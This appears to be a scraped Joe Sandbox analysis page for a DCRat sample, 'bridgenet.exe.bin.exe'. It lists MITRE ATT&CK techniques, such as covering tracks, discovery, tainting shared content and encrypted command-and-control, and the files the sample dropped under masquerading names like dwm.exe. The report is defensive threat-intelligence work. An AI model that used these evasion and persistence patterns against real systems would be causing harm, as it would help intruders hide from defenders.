Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bridgenet.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files (x86)\jDownloader\config\ed3206c147f2f1

C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe:Zone.Identifier

C:\Program Files\Internet Explorer\images\6cb0b6c459d5d3

C:\Program Files\Internet Explorer\images\dwm.exe

C:\Program Files\Internet Explorer\images\dwm.exe:Zone.Identifier

C:\Program Files\Windows Photo Viewer\ed3206c147f2f1

C:\Program Files\Windows Photo Viewer\en-GB\ed3206c147f2f1

Windows Analysis Report
bridgenet.exe.bin.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre